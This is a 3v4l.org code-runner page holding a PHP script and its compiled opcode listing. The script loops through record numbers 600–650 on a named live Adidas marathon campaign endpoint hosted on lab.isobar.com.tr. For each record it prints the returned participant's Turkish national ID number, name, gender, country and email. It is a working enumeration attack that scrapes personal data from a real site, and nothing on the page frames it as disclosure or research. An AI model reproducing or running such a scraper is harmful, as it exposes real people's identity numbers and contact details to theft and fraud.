3v4l.org

run code in 300+ PHP versions simultaneously
<?php header("Content-Type: text/html; charset=utf-8"); set_time_limit(0); for ($i=600;$i<=650;$i++) { $postdata = "gogus_no=".$i."&email=q@q.com&allowMail=1"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"https://lab.isobar.com.tr/adidas/maratonyolculugu/getimages/service/post.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS,$postdata); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); if (0 === strpos(bin2hex($data), 'efbbbf')) { $data = substr($data, 3); } $sonuc = json_decode($data); echo $i . ","; echo $sonuc->KayitId . ","; echo $sonuc->TcKimlik . ","; echo $sonuc->Adi . ","; echo $sonuc->Soyadi . ","; echo $sonuc->Cinsiyet . ","; echo $sonuc->Ulke . ","; echo $sonuc->Mail; echo "<br>"; }
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 87
Branch analysis from position: 87
2 jumps found. (Code = 44) Position 1 = 89, Position 2 = 8
Branch analysis from position: 89
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 8
2 jumps found. (Code = 43) Position 1 = 54, Position 2 = 59
Branch analysis from position: 54
2 jumps found. (Code = 44) Position 1 = 89, Position 2 = 8
Branch analysis from position: 89
Branch analysis from position: 8
Branch analysis from position: 59
filename:       /in/W0vkU
function name:  (null)
number of ops:  90
compiled vars:  !0 = $i, !1 = $postdata, !2 = $ch, !3 = $data, !4 = $sonuc
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   INIT_FCALL                                               'header'
          1        SEND_VAL                                                 'Content-Type%3A+text%2Fhtml%3B+charset%3Dutf-8'
          2        DO_ICALL                                                 
    4     3        INIT_FCALL                                               'set_time_limit'
          4        SEND_VAL                                                 0
          5        DO_ICALL                                                 
    5     6        ASSIGN                                                   !0, 600
          7      > JMP                                                      ->87
    6     8    >   CONCAT                                           ~8      'gogus_no%3D', !0
          9        CONCAT                                           ~9      ~8, '%26email%3Dq%40q.com%26allowMail%3D1'
         10        ASSIGN                                                   !1, ~9
    8    11        INIT_FCALL_BY_NAME                                       'curl_init'
         12        DO_FCALL                                      0  $11     
         13        ASSIGN                                                   !2, $11
    9    14        INIT_FCALL_BY_NAME                                       'curl_setopt'
         15        SEND_VAR_EX                                              !2
         16        FETCH_CONSTANT                                   ~13     'CURLOPT_URL'
         17        SEND_VAL_EX                                              ~13
         18        SEND_VAL_EX                                              'https%3A%2F%2Flab.isobar.com.tr%2Fadidas%2Fmaratonyolculugu%2Fgetimages%2Fservice%2Fpost.php'
         19        DO_FCALL                                      0          
   10    20        INIT_FCALL_BY_NAME                                       'curl_setopt'
         21        SEND_VAR_EX                                              !2
         22        FETCH_CONSTANT                                   ~15     'CURLOPT_POST'
         23        SEND_VAL_EX                                              ~15
         24        SEND_VAL_EX                                              <true>
         25        DO_FCALL                                      0          
   11    26        INIT_FCALL_BY_NAME                                       'curl_setopt'
         27        SEND_VAR_EX                                              !2
         28        FETCH_CONSTANT                                   ~17     'CURLOPT_POSTFIELDS'
         29        SEND_VAL_EX                                              ~17
         30        SEND_VAR_EX                                              !1
         31        DO_FCALL                                      0          
   12    32        INIT_FCALL_BY_NAME                                       'curl_setopt'
         33        SEND_VAR_EX                                              !2
         34        FETCH_CONSTANT                                   ~19     'CURLOPT_RETURNTRANSFER'
         35        SEND_VAL_EX                                              ~19
         36        SEND_VAL_EX                                              <true>
         37        DO_FCALL                                      0          
   13    38        INIT_FCALL_BY_NAME                                       'curl_exec'
         39        SEND_VAR_EX                                              !2
         40        DO_FCALL                                      0  $21     
         41        ASSIGN                                                   !3, $21
   14    42        INIT_FCALL_BY_NAME                                       'curl_close'
         43        SEND_VAR_EX                                              !2
         44        DO_FCALL                                      0          
   15    45        INIT_FCALL                                               'strpos'
         46        INIT_FCALL                                               'bin2hex'
         47        SEND_VAR                                                 !3
         48        DO_ICALL                                         $24     
         49        SEND_VAR                                                 $24
         50        SEND_VAL                                                 'efbbbf'
         51        DO_ICALL                                         $25     
         52        IS_IDENTICAL                                             $25, 0
         53      > JMPZ                                                     ~26, ->59
   16    54    >   INIT_FCALL                                               'substr'
         55        SEND_VAR                                                 !3
         56        SEND_VAL                                                 3
         57        DO_ICALL                                         $27     
         58        ASSIGN                                                   !3, $27
   18    59    >   INIT_FCALL                                               'json_decode'
         60        SEND_VAR                                                 !3
         61        DO_ICALL                                         $29     
         62        ASSIGN                                                   !4, $29
   19    63        CONCAT                                           ~31     !0, '%2C'
         64        ECHO                                                     ~31
   20    65        FETCH_OBJ_R                                      ~32     !4, 'KayitId'
         66        CONCAT                                           ~33     ~32, '%2C'
         67        ECHO                                                     ~33
   21    68        FETCH_OBJ_R                                      ~34     !4, 'TcKimlik'
         69        CONCAT                                           ~35     ~34, '%2C'
         70        ECHO                                                     ~35
   22    71        FETCH_OBJ_R                                      ~36     !4, 'Adi'
         72        CONCAT                                           ~37     ~36, '%2C'
         73        ECHO                                                     ~37
   23    74        FETCH_OBJ_R                                      ~38     !4, 'Soyadi'
         75        CONCAT                                           ~39     ~38, '%2C'
         76        ECHO                                                     ~39
   24    77        FETCH_OBJ_R                                      ~40     !4, 'Cinsiyet'
         78        CONCAT                                           ~41     ~40, '%2C'
         79        ECHO                                                     ~41
   25    80        FETCH_OBJ_R                                      ~42     !4, 'Ulke'
         81        CONCAT                                           ~43     ~42, '%2C'
         82        ECHO                                                     ~43
   26    83        FETCH_OBJ_R                                      ~44     !4, 'Mail'
         84        ECHO                                                     ~44
   27    85        ECHO                                                     '%3Cbr%3E'
    5    86        PRE_INC                                                  !0
         87    >   IS_SMALLER_OR_EQUAL                                      !0, 650
         88      > JMPNZ                                                    ~46, ->8
   28    89    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
289.18 ms | 1404 KiB | 26 Q